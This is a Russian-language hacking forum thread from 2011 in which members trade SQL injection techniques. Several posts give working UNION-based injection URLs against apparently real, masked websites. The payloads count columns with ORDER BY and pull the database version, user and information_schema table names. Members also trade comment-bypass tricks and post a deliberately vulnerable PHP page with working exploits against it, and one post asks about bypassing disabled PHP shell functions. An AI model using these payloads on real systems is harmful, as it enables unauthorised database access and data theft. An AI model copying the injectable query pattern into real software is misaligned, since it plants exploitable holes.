Старый 30.04.2011, 15:43   #981
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Добрый день.

Вопрос по дампу:
Цитата:
(wso2) mysqldump --host=localhost --user=123 --password=123 --all-databases > dump.sql
На отметке ~1.8(1.9)Gb файл исчезает...
Тоже самое если дампить в /tmp/
wtf?!
Cross вне форума   Ответить с цитированием
Старый 01.05.2011, 13:53   #982
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 129
Репутация: 20
По умолчанию

Код:
http://www.***.com/shows/cinr_suite?id=-116'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,unhex%28hex%28version%28%29%29%29,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132+--+
Как они(кто-то на ачате) вычислили количество полей?
Врят ли они перебирали все поля т.к. до конца приведенной строки вообще нельзя было сказать что там есть скуля.
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz

Последний раз редактировалось Twost; 16.05.2013 в 09:20..
lukmus вне форума   Ответить с цитированием
Старый 01.05.2011, 13:57   #983
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Цитата:
Сообщение от lukmus Посмотреть сообщение
Код:
http://www.***.com/shows/cinr_suite?id=-116'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,unhex%28hex%28version%28%29%29%29,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132+--+
Как они(кто-то на ачате) вычислили количество полей?
Врят ли они перебирали все поля т.к. до конца приведенной строки вообще нельзя было сказать что там есть скуля.
омг

http://www.***.com/shows/cinr_suite?id=116'+order+by+132--+1
http://www.***.com/shows/cinr_suite?id=116'+order+by+133--+1

Последний раз редактировалось Twost; 16.05.2013 в 09:20..
Ded MustD!e вне форума   Ответить с цитированием
Старый 01.05.2011, 14:15   #984
lukmus
 
Аватар для lukmus
 
Регистрация: 11.08.2010
Сообщений: 129
Репутация: 20
По умолчанию

Цитата:
Сообщение от Ded MustD!e Посмотреть сообщение
омг

http://www.***.com/shows/cinr_suite?id=116'+order+by+132--+1
http://www.***.com/shows/cinr_suite?id=116'+order+by+133--+1
руку на отсечение даю я так пробывал и разницы не заметил, это все первомай
__________________
Контактный XMPP: lukmus[собака]wallstreetjabber.biz

Последний раз редактировалось Twost; 16.05.2013 в 09:21..
lukmus вне форума   Ответить с цитированием
Старый 03.05.2011, 09:48   #985
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

XAMPP 1.7.3!
mysql 5.1.41

ветки выше не смотрел

# (%23) -> только работает этот коментарий.

С браузера еще работает --%0D в лисе, и в опере.
Если так --[тут пробел невидный] -> не работает.

как врубить /* еще кто скажет, нужно для теста?

получ. рабочих только 2 комента в этой сборке, интересно:
%23, --%0D, также работает %20,%09

%0А, /**/, /*tuns*/, не сработали


PHP код:
<html>
<head>
<title>vulnhost</title>
</head>
<body>
ниже текст с БД<br>
<?
/*
CREATE DATABASE `test` ;

CREATE TABLE `test`.`news` (
`news_id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`title` VARCHAR( 255 ) NOT NULL ,
`content` TEXT NOT NULL
) ENGINE = MYISAM ;

INSERT INTO `test`.`news` (`news_id` ,`title` ,`content`) VALUES ( NULL , 'title1', 'content1 content1 content1 content1 content1' );
INSERT INTO `test`.`news` ( `news_id` , `title` , `content` ) VALUES ( NULL , 'title2', 'content2 content2 content2 content2 content2');

*/
error_reporting(E_ALL);

mysql_connect('localhost','root','');
mysql_select_db('test');

$res=mysql_query("select * from news where news_id ='".$_GET['ev']."' or 1=1");

if (
$res)
{
while (
$row=mysql_fetch_array($res) )
  {
   echo 
"Название статьи - <b>".$row[1]."</b><br>";
   echo 
$row[2]."<br>";
  }
}

?>
</body>
}{оттабыч вне форума   Ответить с цитированием
Старый 03.05.2011, 10:40   #986
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
XAMPP 1.7.3!
mysql 5.1.41

ветки выше не смотрел

# (%23) -> только работает этот коментарий.

С браузера еще работает --%0D в лисе, и в опере.
Если так --[тут пробел невидный] -> не работает.

как врубить /* еще кто скажет, нужно для теста?

получ. рабочих только 2 комента в этой сборке, интересно:
%23, --%0D, также работает %20,%09

%0А, /**/, /*tuns*/, не сработали
Не знаю как оценивать этот пост, но исходя из названия темы:

Ищем в нём вопрос (это-же не ответ на чей-то пост, правда?)

Знак вопроса встречается вот в этой фразе:
Цитата:
как врубить /* еще кто скажет, нужно для теста?
Ок, пробуем вычленить разумное:
Сам вопрос, видимо "как врубить /*", остальная часть предложения - непереводимая игра слов.

Ответ:
Поставить mysql < 5.0.51. С этой версии незакрытый многострочный комментарий (/*) базой не воспринимается и даёт ошибку

Надеюсь интуиция меня не подвела.
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 03.05.2011, 10:42   #987
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

спс, но перестовлять я не хочу.
хотелось бы тут "класический" вариант.
}{оттабыч вне форума   Ответить с цитированием
Старый 03.05.2011, 19:51   #988
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Цитата:
Сообщение от }{оттабыч Посмотреть сообщение
XAMPP 1.7.3!
mysql 5.1.41

ветки выше не смотрел

# (%23) -> только работает этот коментарий.

С браузера еще работает --%0D в лисе, и в опере.
Если так --[тут пробел невидный] -> не работает.

как врубить /* еще кто скажет, нужно для теста?

получ. рабочих только 2 комента в этой сборке, интересно:
%23, --%0D, также работает %20,%09

%0А, /**/, /*tuns*/, не сработали


PHP код:
<html>
<head>
<title>vulnhost</title>
</head>
<body>
ниже текст с БД<br>
<?
/*
CREATE DATABASE `test` ;

CREATE TABLE `test`.`news` (
`news_id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`title` VARCHAR( 255 ) NOT NULL ,
`content` TEXT NOT NULL
) ENGINE = MYISAM ;

INSERT INTO `test`.`news` (`news_id` ,`title` ,`content`) VALUES ( NULL , 'title1', 'content1 content1 content1 content1 content1' );
INSERT INTO `test`.`news` ( `news_id` , `title` , `content` ) VALUES ( NULL , 'title2', 'content2 content2 content2 content2 content2');

*/
error_reporting(E_ALL);

mysql_connect('localhost','root','');
mysql_select_db('test');

$res=mysql_query("select * from news where news_id ='".$_GET['ev']."' or 1=1");

if (
$res)
{
while (
$row=mysql_fetch_array($res) )
  {
   echo 
"Название статьи - <b>".$row[1]."</b><br>";
   echo 
$row[2]."<br>";
  }
}

?>
</body>
Во-первых, несовсем понятно, зачем тебе многострочный коментарий, если запрос таковым не является?

Во-вторых, у тебя работает "-- " и "#", это снова возвращает нас к предыдущему вопросу.
Код:
http://localhost/xxx.php?ev=o0'and(0)union(select(1),2,version())--+1
http://localhost/xxx.php?ev=o0'and(0)union(select(1),2,version())%23
Где на месте "+" твой работающий пробел.

В-третьих, коментарий тут и не нужен
Код:
http://localhost/xxx.php?ev=o0'+union+select+1,2,version()+from(select+1)x+where+'1'='1
http://localhost/xxx.php?ev=o0'+union+select+1,2,table_name+from+information_schema.tables+where+'1
Ну и наконец, представим, что нужен многострочный коментарий, для этого создадим еще одну таблицу, исправим запрос и его логику, а также сам код:
PHP код:
<html>
<head>
<title>vulnhost</title>
</head>
<body>
ниже текст с БД<br>
<?
/*
CREATE DATABASE `test` ;

CREATE TABLE `test`.`news` (
`news_id` INT NOT NULL AUTO_INCREMENT PRIMARY KEY ,
`title` VARCHAR( 255 ) NOT NULL ,
`content` TEXT NOT NULL
) ENGINE = MYISAM ;

CREATE TABLE test.news_extra
(
id INT AUTO_INCREMENT PRIMARY KEY,
author VARCHAR(30) NOT NULL
);

INSERT INTO `test`.`news` (`news_id` ,`title` ,`content`) VALUES ( NULL , 'title1', 'content1 content1 content1 content1 content1' );
INSERT INTO `test`.`news` ( `news_id` , `title` , `content` ) VALUES ( NULL , 'title2', 'content2 content2 content2 content2 content2');

INSERT INTO test.news_extra(author)VALUES('author1');
INSERT INTO test.news_extra(author)VALUES('author2');


*/
error_reporting(E_ALL);

mysql_connect('localhost','root','');
mysql_select_db('test');

$res=mysql_query("SELECT news.*,news_extra.author from news, news_extra
                       WHERE news.title LIKE '"
.$_GET['a']."'
                                and news_extra.author='asd'
                                  and news.news_id IN(1,2)"
);

if (
$res)
{
while (
$row=mysql_fetch_array($res) )
  {
   echo 
"Название статьи - <b>".$row[1]."</b><br>";
   echo 
$row[0];
   echo 
$row[2]."<br>";
  }
}

?>
</body>
В данном случае, чтобы не зависить от условия которое идет после и не было ошибок идет обращение к той же таблице(в данном случае их 2).
Код:
http://localhost/asd.php?a=1'+union+select+1,version(),3,4+from+news,news_extra+where+1+or+'a'='a
http://localhost/asd.php?a=1'+union+select+1,table_name,3,4+from+news,news_extra,information_schema.tables+where+1+or+'a'='a
~d0s~ вне форума   Ответить с цитированием
Старый 03.05.2011, 22:08   #989
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Cпасиба за ответ ~dos~.

Ответ уже был дан, что надо переставить mysql.

Я знаю что можно юзать "+", "%20" при URL кодировании, и обойтись бес многострочного закрыв. комента */ в ветке mysql > 5.0.50 : 'or '1'='1

'or '1'='1 конструкции вида не всегда дадут принтабельный вид.

Мне нужен был многострочный комент для отладки кода.

Цитата:
Во-первых, несовсем понятно, зачем тебе многострочный коментарий, если запрос таковым не является?
Многострочный коментарий можно юзать также когда запрос однострочный.

Если "многострочный коментарий" так назыв. это не значит что только юзать когда запрос многострочный.

example:
Код:
http://www.***.com/article.php?gid=0%27&hilow=asc&monyr=4-2011&page=twitch_hiscores%27+and+1=2+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6,7,8%20,9,10,11/*
Код:
http://www.***.com/article.php?gid=0%27&hilow=asc&monyr=4-2011&page=twitch_hiscores%27+and+1=2+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,6,7,8%20,9,10,11--+

Последний раз редактировалось Twost; 17.05.2013 в 10:49..
}{оттабыч вне форума   Ответить с цитированием
Старый 04.05.2011, 21:25   #990
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

Цитата:
Disabled PHP Functions: popen,dl,passthru,system,exec,proc_open,shell_exec,proc_close
зачем запрещать proc_close ? разве с него можно что-то полезное поиметь ?

можно где нить посмотреть пример полезного юзания dl ?
DrakonHaSh вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot